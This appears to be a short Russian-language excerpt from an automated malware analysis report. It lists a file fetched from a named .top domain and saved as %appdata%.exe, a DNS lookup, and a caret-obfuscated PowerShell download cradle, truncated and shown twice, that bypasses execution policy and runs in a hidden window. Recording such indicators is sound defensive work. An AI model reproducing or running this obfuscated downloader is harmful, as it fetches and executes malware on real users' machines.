Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^Ow^e^RShe^L^l.exe -^EXe^Cut^I^oN^POL^i^CY bYpaSs ^-N^OprO^F^I^le ^-^W^inD^OwsT^ylE ^HId^Den (nEW^-OBJeC^T^ SYs^tem.^Ne^t.WebCL^i^EN^t).do^Wn^l^oad^F^IlE('http://mondayhelthc....
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "p^Ow^e^RShe^L^l.exe -^EXe^Cut^I^oN^POL^i^CY bYpaSs ^-N^OprO^F^I^le ^-^W^inD^OwsT^ylE ^HId^Den (nEW^-OBJeC^T^ SYs^tem.^Ne^t.WebCL^i^EN^t).do^Wn^l^oad^F^IlE('http://mondayhelthc....' (со скрытым окном)